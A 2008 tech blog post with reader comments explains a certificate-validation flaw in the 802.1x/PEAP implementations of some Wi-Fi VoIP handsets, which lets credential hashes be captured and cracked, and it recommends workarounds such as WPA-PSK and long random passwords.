Design flaw in wireless VoIP handsets endanger the enterprise

Design flaw in wireless VoIP handsets endanger the enterprise

Summary: Update 2/23/2008 - Cisco confirms vulnerability in 7921 Wi-Fi IP phoneSecurity conscious businesses and organizations who implemented 802.1x/EAP enterprise-grade authentication are at risk with certain implementations of wireless LAN VoIP handsets.

SHARE:

Update 2/23/2008 - Cisco confirms vulnerability in 7921 Wi-Fi IP phone

Security conscious businesses and organizations who implemented 802.1x/EAP enterprise-grade authentication are at risk with certain implementations of wireless LAN VoIP handsets.  I have verified that Vocera Communications is one of the vulnerable vendors and I have heard from other security researchers that Cisco's wireless VoIP handsets have this design flaw as well.  I'm trying to get official responses from Vocera and Cisco.  Based on the Vocera's own PDF documentation on page 55, we have the following admission.

PEAP is a two-part protocol. In the first part, an authentication server and a client set up an encrypted Transport Level Security (TLS) tunnel. The badge accepts a certificate from the authentication server, but does not validate it because of the processing overhead required.

From a security standpoint, this is a reckless design decision that undermines the whole purpose of using strong EAP authentication with asymmetric cryptography in the first place.  By skipping the certificate checking process, it effectively reverts 802.1x PEAP authentication to the insecure level of Cisco's proprietary LEAP authentication.  What this means is that a client (the wireless VoIP phone in this case) will assume that the wireless access point and its backend authentication infrastructure is authentic and not check its certificate for authenticity due to processing overhead.

By not validating the server certificate, the client's hashed password would be sent in the clear to an attacker trying to hack the network.  Because the strength of hash passwords depend solely on the complexity and length of the password, hashed passwords typically can't withstand a password dictionary attack for more than a few hours.  There are some EAP implementations where hashing isn't even used and in those cases the password would immediately be exposed as clear text under this attack.  Once the password is cracked and the username is already known due to the fact that it was sent in the clear, an attacker not only has the means to enter a network but they have the user credentials to access all the servers and applications.  From a security stand point, this is a worst case scenario.  If Domain Admin passwords were compromised in this matter, then the keys to the kingdom would be compromised.

Temporary workarounds: Do not use 802.1x/EAP authentication on these vulnerable clients that don't perform certificate checks and use WPA-PSK on these vulnerable embedded devices.  WPA-PSK mode is also much faster for these computationally-challenged embedded devices which cuts down on startup and roaming times.  If you have to use LEAP, certificate-unverified PEAP, or certificate-unverified EAP-FAST mode, you have to assume that the password hash can be exposed to an attacker.

Note: LEAP makes zero effort to protect the hashed password since it is sent in the clear.  Many implementations of EAP-FAST are fundamentally weak because they employ anonymous server certificates which can be made up by anyone.  PEAP can be secure if it's implemented and deployed correctly where the digital certificate's signer and subject field (server name) are properly verified by the client.

If you still have to use these vulnerable clients in this vulnerable EAP implementation, then the password you use has to be a random 32-character alpha-numeric password to achieve roughly 128 bits of entropy.  If 64 bits of entropy is enough, then a random 16 character alpha-numeric password will suffice.  Special characters are not recommended since it might cause some compatibility problems with some wireless infrastructure or devices and the keypads on mobile devices may not be able to enter them.

If you're using WPA-PSK, you can reasonably use a random 10-16 character alpha-numeric PSK (Pre-Shared Key) passphrase because it's extremely time consuming and CPU intensive to run a dictionary attack against WPA-PSK.  One downside to WPA-PSK is that every client uses the same PSK so if you lose one of those devices configured with the PSK, you have to re-key every client device.  The other downside to WPA-PSK mode is that a compromised PSK allows the attacker to decrypt other WPA-PSK sessions that use the same key.  There is a way to get around these two shortcomings by using Dynamic PSK mode from Ruckus which uses a very practical and effective per-client PSK, but that's only for the Ruckus products.

Conclusion: Until these design flaws in the client-side PEAP and EAP-FAST implementation are solved, users will not be able to use the reasonably short passwords that they currently use in authentication directories such as Active Directory or the short pins they use with their phones.  Even if these flaws are fixed, the computational resources required for certificate validation may make these embedded devices too slow for roaming.  Fortunately, the PMK caching and pre-authentication features in the WPA2 standard will permit seamless roaming if your infrastructure and clients support it.

Topics: Unified Comms, Mobility, Networking, Security, Wi-Fi

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

19 comments
Log in or register to join the discussion
  • Hacked through a Headset?

    I don't know if I want to be embarrassed if such a thing happened. At times we have to admit, "Wired is better"
    nucrash
    • Not a headset, a wireless LAN communicator or handset

      Not a headset, a wireless LAN communicator or handset. These things are basically mini-computers running an embedded OS with a SIP client. The client basically takes a server's word that it's legitimate and is too willing to hand over hashed pins or passwords. If you got a 16-32 character alpha-numeric password or a longer numeric pin, then you?re safe since it would be as hard to crack the password as it is to brute force the crypto.

      That?s not very usable though since most people want to be able to use a 6-digit pin which provides one million combinations. If you force the attacker to do an online attack, even 10,000 combinations becomes impractical since you can lock the account out. But with a dictionary attack on the hash, 45 million combinations can be scanned in a single second on a slow computer.
      georgeou
      • How many actually use Account Lockout though?

        I know with many financial firms, this is almost required, but with some lesser concerned firms, this is probably over looked. I think the reality comes into play when you look at less than common attack vectors. Why attack through the front door with an army when a single saboteur can sneak in the back and do much more damage.

        Wasn't the Websense guy going on about new attack vectors?
        nucrash
        • Not implementing account lockout or throttling is reckless

          Not implementing account lockout or throttling is reckless. At the very least, you need something that slows the rate at which you can log in to 3 times per hour. That would take you an average of 19 years to guess the right 6-digit numeric pin and it would be obvious from the logs that someone is trying to break in through trial and error.
          georgeou
  • When will the consumer stop...

    this madness? Start suing this companies that put your lively hood at risk and this would all stop!
    bjbrock
    • It won't stop until the media starts treating every company like Microsoft

      It won't stop until the media starts treating every company like Microsoft. Right now, the press and the public only make a big deal out of Microsoft issues but they pretty much let everyone else pass. As a result, all these other companies get to behave the way Microsoft behaved in the 90s and early 2000s and they're not going to clean up their act.
      georgeou
    • the consumer will never stop...

      The consumer is generally a moron. He goes about his business without a care in the world. He probably won't get his voip headset hacked because hes really not that important, even if he was, he might still be lucky.

      So, it's really up to the techs to get this issues addressed. If need be, involved parties would push to have products removed from the market.

      In any case, suing a company in a class action lawsuit would be ideal only if there were reasonable grounds. In this case, I don't think the consumer was mislead or misinformed, so no case.

      In retrospect, imagine all of the security and safety flaws that potentially exist in most products. If it was that important to address them all ... OR ELSE, then we'd be crouched naked in the woods waiting for GOD to save us.
      scofrezo
      • It's not the headset being hacked, it's the handset disclosing user credent

        It's not the headset being hacked, it's the handset disclosing user credentials for network and server login. That's extremely dangerous.
        georgeou
  • RE: Design flaw in wireless VoIP handsets endanger the enterprise

    George, it appears that one of the chief potential problems is with implementations of
    Vocera that follow the vendors recommended "best practice." In such a case, a
    company will end up with ONE common user id, ONE common password, ONE
    common PAC file for ALL of the deployed devices (in some cases 400+ devices).

    On the computational front, computational power increases constantly, in concert
    with hackers constantly improving their routines. When vendors such as Vocera
    addresses security concerns of major customers with less than complete
    implementations of existing standards, they potentially expose their customers to
    unnecessary risk . . . and yes, it's probably because not enough people are paying
    attention.
    martin.maher@...
    • Good points. If you're going to use one password, then just use WPA-PSK

      "In such a case, a company will end up with ONE common user id, ONE common password, ONE common PAC file for ALL of the deployed devices (in some cases 400+ devices)."

      Good points. If you're going to use one password, then just use WPA-PSK. Why bother with all that computational overhead if you're just going to use one key? WPA-PSK works very well and it's much harder to brute force since it uses a hundred rounds of SHA-1 to hash the password.
      georgeou
      • using WPA-PSK . . .

        George: This presumes that our standard wireless network deployment currently
        supports WPA-PSK. Additionally, it is against security policy, for very good reasons, to
        use common usernames and passwords. This creates a situation where, as you
        pointed out in your original article, once the single user name | password pair is
        compromised, it's reconfigure everything time. The solution, as I believe your article
        was originally attempting to point out, is to demand better security from vendors.
        martin.maher@...
        • I said if you're going to use one LEAP/PEAP password, then just use WPA-PSK

          I said if you're going to use one LEAP/PEAP password, then just use WPA-PSK since it's MUCH more secure. You're talking about one round of MD5 hashing versus 100 rounds of SHA-1 along with a working SALT making it far more difficult to brute force a WPA-PSK key than a LEAP or broken-PEAP key.
          georgeou
  • RE: Design flaw in wireless VoIP handsets endanger the enterprise

    To be fair, ALL OF America operates on a "moronic" level when it comes to security, especially with technology. Case in point: How many of you reading this post routinely send ONLY encrypted email messages as a matter of policy? I would wager that none of you do- because if you did 99% of your intended recipients would be clueless how or just not motivated enough to decrypt it. I tire of the "I've got nothing to hide" excuse because it's costing all of us REAL money! When just one person gets their password stolen, identity jacked, bank account emptied WE ALL PAY. How? In many ways not the least of which is the VERY real cost that banks and other institutions pass along to us when they realize they have to upgrade their systems.

    I was astounded at just how much sensitive information that I routinely get and send via email. When you realize that ISP's are required by law to archive a minimum time-frame of EVERYTHING that goes through their servers, you have to ask yourself, just who and how is this archived data protected?

    The problem is HUGE and we're just seeing the tip of the iceberg.
    turbohawk
    • This should not be compared to sending unencrypted email

      This should not be compared to sending unencrypted email. Email typically can't be sniffed without control of the network infrastructure. That may be wide open in an unsecured wireless LAN but it's not so easy in most other situations.

      This is talking about a potential backdoor in to an enterprise network.
      georgeou
  • RE: Design flaw in wireless VoIP handsets endanger the enterprise

    "By not validating the server certificate, the client???s hashed password would be sent in the clear to an attacker trying to hack the network"
    Why can't the client encrypt the password with the cert that was recieved even if it wasn't validated? Why do you assume the password would be sent in the clear?
    Techref6060
    • Encryption doesn't matter if the guy on other end is the bad guy

      Encryption doesn't matter if the guy on other end is the bad guy. The only way you know if you're talking to an authentic server is to check the certificate signature and validate it. If you skip that process, you can potentially be setting up a "secure" encrypted session with the bad guy where both of you have the TLS session key to encrypt/decrypt the content. That means you're sending the hashed password to the attacker which makes it extremely to crack open.
      georgeou
  • Bigger issue

    this is just a spin on an blog posted to avert, http://www.avertlabs.com/research/blog/index.php/2008/02/21/can-i-own-your-wireless-network/

    the tool mentioned there demonstrates this attack.
    ryanbachler@...
    • Josh is cool

      I will be writing on that too.

      In this case however, even a correct deployment isn't enough.
      georgeou
  • VPN never had this one-off consumer concern so easy; I would guess.

    Pay scales must be coming down as square footage is going to start moving again for the "GREEN" home customer spends on the depreciation of their property through income averaging to mast higher earnings for atleast six years with a 100% return on their investment. Cellular is a legal design feature limited; I have to say that laptops with voip are for surfing at the Cafe'. The abuse as a rotory means to be a rogue operation and recruit pages with cash (spiff) when completing a target has alot of work to hold law-enforcement responsible and open the court system for the common good as victums. 2007 was the beginning of 'Victumless' Crime in the Unired States. From my point of view the open abuse is Congress' fault for leading this Country into a Multi-tiered lightspeed social system ie crunching hard on the median income tax payers and posting higher crime from the fear into any means of Socialism to save the growing population. Doesn't effect me I'll be in Heaven below by overtime.
    rtirman37@...